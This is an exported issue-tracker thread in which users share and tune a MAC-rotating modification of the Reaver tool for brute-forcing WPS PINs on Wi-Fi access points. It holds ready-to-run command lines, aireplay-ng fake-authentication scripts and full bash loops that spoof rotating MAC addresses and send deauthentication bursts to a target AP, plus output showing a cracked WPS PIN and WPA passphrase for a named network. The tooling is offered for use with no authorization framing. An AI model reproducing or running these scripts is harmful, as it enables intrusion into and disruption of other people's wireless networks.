Open GoogleCodeExporter opened 9 years ago
Would be a nice improvement - every pin/different mac.
Original comment by music.an...@gmail.com
on 2 Mar 2012 at 7:04
Great! Can you share your modified source code Bob?
Original comment by itmanvn
on 3 Mar 2012 at 2:29
Yes, of course.
Reaver WPS 1.4 with MAC Changer - LINK -
http://www.4shared.com/archive/AHxJ4rDm/reaver-14-mac-changertar.html
Example of use:
reaver -i mon0 -b AA:BB:CC:DD:EE:FF -M
or
reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer
What I recommend:
reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer --no-nacks --win7
--no-associate -vv
To associate more effectively, I recommend to use aireplay-ng tool. Create a
"associate.sh" file, and put this inside:
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:ZF &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:ZE &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:ZD &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:ZC &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:ZB &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:ZA &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z9 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z8 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z7 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z6 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z5 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z4 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z3 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z2 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z1 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z0 &
PS: Change AA:BB:CC:DD:EE:FF to the BSSID and ZZ:ZZ:ZZ:ZZ:ZZ:Z to your MAC
(without the last digit).
Before using reaver tool, just type "sh associate.sh". To kill all the
aireplay-ng, type "killall aireplay-ng".
If you have success using this method, please, share with us to improve more
and more the reaver WPS.
Thanks,
Bob
Original comment by gabrielr...@gmail.com
on 5 Mar 2012 at 3:11
I still dont understand. Like the author said. The wifi ususally doenst block
your MAC addess, it does not have the mac address table. I mean for regular
wifi. But what it is, is it lock WPS instead...Please someone clarify on this
Original comment by ryanl33x...@ymail.com
on 5 Mar 2012 at 5:17
Well, I don't know why or how the AP rejects the "EAPOL Request", but, with the
method I suggested, I retrieved the PIN from some APs with a better speed than
the normal. My intention from sharing the code is to
allow other people to try with other APs and confirm if this method works or
not.
In my case, when reaver got a succesful pin try, some APs rejects the "EAPOL
Request" for some seconds, but, only for the MAC who tried. It isn't a WPS
lock, because I can continue trying PINs. I got this behavior with TP-LINK and
D-Link APs.
Original comment by gabrielr...@gmail.com
on 5 Mar 2012 at 2:53
Hi Bob,
Tried your method but no luck, I use Alfa AWUS036H and AP is a Linksys
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
The only way still work with this AP is:
1. aireplay-ng -1 10 -a 00:23:69:XX:XX:XX -e Hitech mon3 --ignore-negative-one
2. reaver -A -b 00:23:69:XX:XX:XX -c 6 -vv -i mon3 --dh-small --no-nacks
--ignore-locks --win7 -d 25
But this too slow :(
Original comment by itmanvn
on 5 Mar 2012 at 4:08
Hello,
ryanl33x1511: I found the answer! Some APs deauthenticates the client who tried
a pin. With the MAC Changer method, when one MAC is deauthenticated (and the
aireplay-ng take a time to authenticate), another is trying a new pin.
itmanvn: Are you using the aireplay-ng to authenticate all the MACs? Like the
associate.sh that I suggested. And you have to check if your wireless card
supports the injection of packets of differents MACs than yours original.
Regards,
Bob
Original comment by gabrielr...@gmail.com
on 8 Mar 2012 at 3:17
Hi Bob,
It was my mistake, I put wrong AP's MAC :)). Just hacked a Dlink AP. The
Linksys still not improve speed with mac-changer.
[+] 100.00% complete @ 2012-03-07 17:24:41 (8 seconds/pin)
[+] Pin cracked in 34667 seconds
[+] WPS PIN: '32456394'
[+] WPA PSK: 'vnxkthuy'
[+] AP SSID: 'VanHung_Network'
Anyway, with --mac-changer, reaver can not crack the WPA PSK, it's just show
WPS PIN, I have to remove --mac-changer then using -pin to get WPA PSK
Original comment by itmanvn
on 8 Mar 2012 at 4:46
Hi,
It seems that using the --mac-changer method took me some time compared to the
normal -d 0 -t 1 method that i used.
--mac-changer: [+] 45.02% complete @ 2012-03-28 03:23:18 (39 seconds/pin)
-d 0 -t 1: [+] 45.06% complete @ 2012-03-28 03:24:40 (1 seconds/pin)
But it seems that the aireplay arguments helped.
Just my 1c.
Original comment by syakir
on 27 Mar 2012 at 7:25
aare there any chance you could reupload the reaver 1.4 with mac changer has
the link seems to be dead
Original comment by mighty-s...@hotmail.co.uk
on 8 Apr 2012 at 9:05
Hi mighty,
The 4shared link is working, but I uploaded to hotfile for you:
https://hotfile.com/dl/152186405/f53e87e/reaver-1.4-mac-changer.tar.gz.html
Regards,
Bob
Original comment by gabrielr...@gmail.com
on 9 Apr 2012 at 2:27
i get The file link that you requested is not valid. on 4shared also just
downloaded the hotfile one and it says its corrupt
Original comment by mighty-s...@hotmail.co.uk
on 9 Apr 2012 at 5:47
nevermind redownloaded and all working fine thank you
Original comment by mighty-s...@hotmail.co.uk
on 9 Apr 2012 at 5:54
[deleted comment]
im running bt5r2 x86 desktop updated using the modified reaver 1.4 with mac
changer.
ok this was tricky for me with wusb600n v2 (RT3572)
you still have to use the "-m" option along with the NEW "-M"
the -m needs to be the same as what is set with 'ifconfig wlan0 hw ether' for me
everything working good with the mac changer addon.
thanks
Original comment by tdbo...@gmail.com
on 29 Apr 2012 at 5:05
Hello,
Thank you "tdbone1" for sharing your experience, you are right, to use other
MAC you need the "-m" option, sorry for I haven't specified it before.
Regards,
Bob
Original comment by gabrielr...@gmail.com
on 30 Apr 2012 at 12:24
would this help for "warning ap rate limiting"? if so it would be nice to be
able to change mac when rate limiting does occur. the ap I'm experimenting with
accepts +-30 pins and then I have to wait 301 seconds before I can continue the
attack. I'll try reaver on a different machine/mac when the target ap is in
rate limiting (because of attack with machine 1).
peace
Original comment by kasperka...@gmail.com
on 9 Jun 2012 at 8:55
ok I did the test and changing the mac address won't help if the ap is blocked
due to rate limiting.
peace
Original comment by kasperka...@gmail.com
on 9 Jun 2012 at 9:47
I suggest you read the Musket Team 361 entry concerning MAC codes and reaver.
There are numerous comments on the web concerning reaver locked on the first
pin and going no where. The 361 comments solve this but since this deals with
mac coes we thought you might be interested. We have ONLY been playing with
this attack for 48 hours so we were focused on just getting the program to give
us a result. Your variable mac code approach though is intriguing. We are so
new to this program that we do not want to comment further. We were going to
try mac spoofing an associated client to see how this increased the results.
Maybe you will get there before us.
Bring What Is Hidden Into View
Musket Team A(a group of hackers and remote viewers)
Original comment by muske...@yahoo.com
on 30 Jul 2012 at 4:13
#!/bin/sh
# !!!!! Script runs in continous loop TO STOP THIS SCRIPT open a new terminal
window and type killall aireplay-ng !!!!
# Script designed to be run during a reaver attack
# For historical reference previous scripts sending variable macs seemed to
flood the router with association requests
# slowing down the routers ability respond during a reaver attack
# This script allows the user to set transmission rates and only send one(1)
mac code at a time.
# The script is designed for use with Backtrack5(BT5).
# For BT5 users, copy the file to the /usr/bin/ folder and type
variablemacs.sh in a terminal window.
# This script file sends a constantly changing MAC Code to the target AP during
# a reaver attack. You can alter the time,transmission rate and seconds to
reauth by changing the variable
# You can run wash then reaver and open airodump-ng on the same channel as
reaver the run variablemacs.sh
#
# Before you start the program
# Change Target MAC variable within "" to your Target AP and then save the
variablemacs.sh file to the /usr/bin folder
# Make sure the red "" remains around your mac variable entry
# And Again remember to save to the /usr/bin folder after changes are made.
# If you mess up the variables list a copy as comments can be found below
######################################################################
# TARGET="00:1F:5B:8A:47:48" = Arouter, 00:26:75:3E:DD:6C = Brouter
# VARMAC="00:11:22:33:44:5" # Do not alter this unless you understand the
program logic
# MON="mon0" Can be changed if you virtual moniter is different
# TIME="120" #Seconds to reauthenticate
# TRATE="150" # Transmission rate
# DELAY="1m" # Time process active 30s 1m 2m etc
# The # = REM or remarks or comments. The Computer ignores this
#######################################################################
# Below are script the variables
#
TARGET="00:26:75:3E:DD:6C" # Change the mac code to your target!!!!!!!!
VARMAC="00:11:22:33:44:5" # Do not change unless you understand the coding
logic
MON="mon0" # Do not change thisunless your virtual moniter is not designated as
mon0
TIME="120" # Seconds to reauthenticate
TRATE="150" # Transmission rate
DELAY="1m" # Time process active 30s 1m 2m etc
# Note below the 00:11:22:33:44:55 mac has been turned off as it is the same
mac we are using with reaver 1.4
#
for (( ; ;))
do
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"0"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"0" --ignore-negative-one
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"1"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"1" --ignore-negative-one
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"2"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"2" --ignore-negative-one
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"3"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"3" --ignore-negative-one
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"4"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"4" --ignore-negative-one
$MON & sleep $DELAY; kill $!
# echo X
# echo XXXXXXXXXXXXXXXXXXX
# echo STARTING $VARMAC"5"
# echo XXXXXXXXXXXXXXXXXXX
# Remarked out as this is the mac used by reaver
# aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"5" --ignore-negative-one
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"6"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"6" --ignore-negative-one
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"7"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"7" --ignore-negative-one
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"8"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"8" --ignore-negative-one
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"9"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"9" --ignore-negative-one
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"A"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"A" --ignore-negative-one
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"B"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"B" --ignore-negative-one
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"C"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"C" --ignore-negative-one
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"D"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"D" --ignore-negative-one
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"E"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"E" --ignore-negative-one
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"F"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"F" --ignore-negative-one
$MON & sleep $DELAY; kill $!
done
Original comment by muske...@yahoo.com
on 31 Jul 2012 at 8:36
Hello Musket Team A,
Thank you for the script, it will be useful for everybody.
I used my method of attack during 2 months, and the results are very good. Some
people have talked about the rate limiting, but this attack is not to bypass
the rate limiting, this attack is to bypass the delay that the aireplay-ng
needs to re-authenticate a MAC that tried a PIN. While the aireplay-ng
re-authenticates the MAC, the reaver-wps is using another MAC to try another
PIN.
Please, tell us if you find another results and thank you again for the script.
Regards,
Bob
Original comment by gabrielr...@gmail.com
on 31 Jul 2012 at 7:49
We have found a small bug in the program. Once started the program runs
constantly in the background regardless of the killall aireplay-ng command. We
are still testing this approach. We are exploring spoofing an associated
clients mac and mixed short deauth signals embedded in this mac changing
program running contiuously. When the signal is weak the router seems to get
confused and only a reaver program restart sometimes and/or a short deauth
burst like aireplay-ng -0 10 a. target AP mon0 seems to straighten things out
and get the program moving again.
Please note we are field testers working with these tools in the real world and are not trying to redo the fantastic work of the authors of reaver to whom we hold in high regard.
Musket Team Alpha
Original comment by muske...@yahoo.com
on 1 Aug 2012 at 1:00
#!/bin/sh
# Bash Script sends variable mac codes and embedded
deauth to target
# Script designed to be run during a reaver
attack
# !!!!! Script runs in a loop TO STOP THIS SCRIPT open a new terminal window
and type killall aireplay-ng !!!!
#
# Use this program to unstick routers when EAPOL warning messages or reception
timeouts occur randomly during attack
# Manny times a stalled reaver attack begins to function the moment the first
deauth in the loop is sent.
# This script allows the user to set transmission rates and only send one(1)
mac code at a time.
# The script is designed for use with Backtrack5(BT5).
# For BT5 users, copy the file to the /usr/bin/ folder and type
variablemacs01.sh in a terminal window.
# You can alter the time,transmission rate and seconds to reauth, number of
deauths and number of loops by changing the variable
# You can run wash then reaver and open airodump-ng on the same channel as
reaver the run variablemacs.sh
# Make sure when running airodump-ng that you run it with the channel -c
command set to the same channel as reaver
# If a mistake is made stop reaver, stop airodump-ng and then restart reaver
etc.
#
#Setup before starting
# Change Target MAC variable within "" to your Target AP and then save the
variablemacs01.sh file to the /usr/bin folder
# Make sure the red "" remains around your mac variable entry
# And Again remember to save to the /usr/bin folder after changes are made.
# If you mess up the variables list a copy as comments can be found below
######################################################################
# TARGET="00:1F:5B:8A:47:48"
# VARMAC="00:11:22:33:44:5" # Do not alter this unless you understand the
program logic
# MON="mon0" Can be changed if your virtual moniter is different
# TIME="120" # Seconds to reauthenticate
# TRATE="150" # Transmission rate
# DELAY="1m" # Time process active 30s 1m 2m etc
# DEAUTH="20" # Number of Deauths
# COUNT="5" # Set number of loops required. Note with the following variables
set one(1) loop = approx 5 minutes
# The # = REM or remarks or comments. The Computer ignores echo X
#
#######################################################################
# Below are the script variables
#
TARGET="00:26:75:41:49:6C" # Change the mac code to your target!!!!!!!!
VARMAC="00:11:22:33:44:5" # Do not change unless you understand the coding
logic
MON="mon0" # Do not change thisunless your virtual moniter is not designated as
mon0
TIME="120" # Seconds to reauthenticate
TRATE="150" # Transmission rate
DELAY="1m" # Time process active 30s 1m 2m etc
DEAUTH="20" # Number of Deauths - we currently use 20 as 30 was too long and 10
to short for the routers we attack
COUNT="25" # Number of loops required. Note with the following variables set
one(1) loop = approx 5 minutes
#
while [ $COUNT -gt 0 ]; do
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"0"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"0" --ignore-negative-one
$MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"1"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"1" --ignore-negative-one
$MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"2"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"2" --ignore-negative-one
$MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"3"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"3" --ignore-negative-one
$MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $DEAUTH'deauths'
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -0 $DEAUTH -a $TARGET $MON & sleep $DELAY; killall aireplay-ng
echo XXXXXXXXXXXXXXXXXXXXXXXXX
echo Value of count is: $COUNT
echo XXXXXXXXXXXXXXXXXXXXXXXXX
echo XXXXXXXXXXXXXX END OF LOOP XXXXXXXXXXXXXX
let COUNT=COUNT-1
done
Original comment by muske...@yahoo.com
on 1 Aug 2012 at 6:13
variablemac01.sh update
Allows users to run program and input mac code of target from terminal window.
#!/bin/sh
# Bash Script sends variable mac codes and embedded
deauth to target
# Script designed to be run during a reaver
attack
# !!!!! Script runs in a loop TO STOP THIS SCRIPT open a new terminal window
and type killall aireplay-ng !!!!
#
# Use this program to unstick routers when EAPOL warning messages or reception
timeouts occur randomly during attack
# Manny times a stalled reaver attack begins to function the moment the first
deauth in the loop is sent.
# This script allows the user to set transmission rates and only send one(1)
mac code at a time.
# The script is designed for use with Backtrack5(BT5).
# For BT5 users, copy the file to the /usr/bin/ folder and type
variablemacs01.sh in a terminal window.
# You can alter the time,transmission rate and seconds to reauth, number of
deauths and number of loops by changing the variable
# You can run wash then reaver and open airodump-ng on the same channel as
reaver the run variablemacs.sh
# Make sure when running airodump-ng that you run it with the channel -c
command set to the same channel as reaver
# If a mistake is made stop reaver, stop airodump-ng and then restart reaver
etc.
#
#
######################################################################
# TARGET="00:1F:5B:8A:47:48" Note enetered by keyboard commands
# VARMAC="00:11:22:33:44:5" # Do not alter this unless you understand the
program logic
# MON="mon0" Can be changed if your virtual moniter is different
# TIME="120" # Seconds to reauthenticate
# TRATE="150" # Transmission rate
# DELAY="1m" # Time process active 30s 1m 2m etc
# DEAUTH="20" # Number of Deauths
# COUNT="5" # Set number of loops required. Note with the following variables
set one(1) loop = approx 5 minutes
# The # = REM or remarks or comments. The Computer ignores echo X
#
#######################################################################
# Below are the script variables
# Keyboard Entry Target AP MAC Entry
#
while true
do
echo ''
echo ' Bash Script sends variable mac codes and embedded deauth to target'
echo ' Script designed to be run during a reaver attack'
echo ' Other variables such as number of loops must be set in script file'
echo ' =================================================================='
echo ''
echo ' !!!!!Before continuing complete the following!!!!!'
echo ''
echo ' STOP wash and START reaver on the appropriate channel'
echo ' of Target AP in a separate terminal window'
echo ''
echo ' Start airodump-ng in seperate terminal window'
echo ''
echo ' Example = airodump-ng -c channel of target AP mon0'
echo ''
echo ' !!Channel in reaver must equal = channel in airodump-ng!!'
echo ' !!or reaver will fail!!'
echo ' ========================'
echo ''
echo -n "Please confirm Press y to continue..Press n to abort!!..Press any other key to try again:"
read CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) break ;;
n|N|no|NO|No)
echo Aborting - you entered $CONFIRM
exit
;;
esac
done
echo You entered $CONFIRM. Continuing ...
while true
do
echo ''
echo ''
echo ''
echo -n "Enter your targets mac code >"
read TARGET
echo "You entered: $TARGET"
echo -n "Please confirm Press y to continue..Press n to abort!!..Press any other key to try again:"
echo ''
read CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) break ;;
n|N|no|NO|No)
echo Aborting - you entered $CONFIRM
exit
;;
esac
done
echo You entered $CONFIRM. Continuing ...
#TARGET="20:AA:4B:A7:FD:87" # Change the mac code to your target entered by
keyboard commands!!!!!!!!
VARMAC="00:11:22:33:44:5" # Do not change unless you understand the coding
logic
MON="mon0" # Do not change thisunless your virtual moniter is not designated as
mon0
TIME="120" # Seconds to reauthenticate
TRATE="150" # Transmission rate
DELAY="1m" # Time process active 30s 1m 2m etc
DEAUTH="20" # Number of Deauths - we currently use 20 as 30 was too long and 10
to short for the routers we attack
COUNT="100" # Number of loops required. Note with the following variables set
one(1) loop = approx 5 minutes
#
while [ $COUNT -gt 0 ]; do
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"0"
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"0" --ignore-negative-one
$MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"1"
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"1" --ignore-negative-one
$MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"2"
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"2" --ignore-negative-one
$MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"3"
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"3" --ignore-negative-one
$MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $DEAUTH'deauths'
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -0 $DEAUTH -a $TARGET $MON & sleep $DELAY; killall aireplay-ng
echo XXXXXXXXXXXXXXXXXXX
echo Number of loops remaining =: $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo XXXXXXXXXXXXXX END OF LOOP XXXXXXXXXXXXXX
let COUNT=COUNT-1
done
Original comment by muske...@yahoo.com
on 7 Aug 2012 at 7:29
[deleted comment]
upload to mediafire
http://www.mediafire.com/?sptpfv9kgnof0nr
Original comment by rasimc...@gmail.com
on 2 Jul 2013 at 7:54
Can you help about installation
Original comment by rasimc...@gmail.com
on 2 Jul 2013 at 7:58
Extract the tarball
tar -xzvf reaver-1.4-mac-changer.tar.gz
Install Required Libraries and Tools
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
Build Reaver
cd reaver-1.4-mac-changer
cd src
./configure
make
Install Reaver
sudo make install
Original comment by gabrielr...@gmail.com
on 2 Jul 2013 at 5:01
thanks
Original comment by rasimc...@gmail.com
on 4 Jul 2013 at 6:58
[deleted comment]
[deleted comment]
[deleted comment]
[deleted comment]
[deleted comment]
Now you can grab the code via Github:
https://github.com/gabrielrcouto/reaver-wps
Original comment by gabrielr...@gmail.com
on 24 Mar 2014 at 2:53
Hi Bob, is there any new update on your code? ;)
Original comment by itmanvn
on 26 Mar 2014 at 7:35
Hi itmanvn,
Unfortunately not :-(
Do you have any idea that I can implement?
Original comment by gabrielr...@gmail.com
on 26 Mar 2014 at 5:48
[deleted comment]
Can you improve this to generate random mac every 5(or something like this)
attempts? This would be really helpful against "AP Rate Limiting". I mean
really new MAC, not only last digit.
Original comment by Xas...@gmail.com
on 3 Apr 2014 at 7:07
pls give me the reaver-14-mac-changertar your both link are not working
and also write about how to use it step by step with example
Original comment by patilary...@gmail.com
on 12 Apr 2014 at 7:31
Patilary, download the code from my git repository:
https://github.com/gabrielrcouto/reaver-wps, it's working and it's the same of
reaver-1.4-mac-changer.tar.gz.
About the step by step (guide), you will find some instructions on my git
repository or you can use the bash script posted on this thread by muske.
Xas, I can improve the generation of random macs, but I need to find a new
notebook, on my macbook the reaver doesnt work =(
Original comment by gabrielr...@gmail.com
on 13 Apr 2014 at 3:17
Original issue reported on code.google.com by
gabrielr...@gmail.com
on 2 Mar 2012 at 4:36